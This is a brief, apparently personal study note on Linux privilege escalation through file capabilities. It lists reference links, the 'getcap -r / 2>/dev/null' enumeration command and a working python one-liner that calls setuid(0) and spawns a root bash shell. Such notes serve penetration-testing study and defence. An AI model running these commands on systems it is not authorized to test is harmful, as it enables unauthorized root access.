Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
Similar to SUID/S bit but doesn’t show on the find
to check:
getcap -r / 2>/dev/null
the +ep means permit everything (all capabilities) (actual letters stand for effective permitted).
since it’s on python, we can just run a python code that sets us to root and opens bash:
import os; os.setuid(0); os.system("/bin/bash")run it using the vulnerable python:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
and we get root!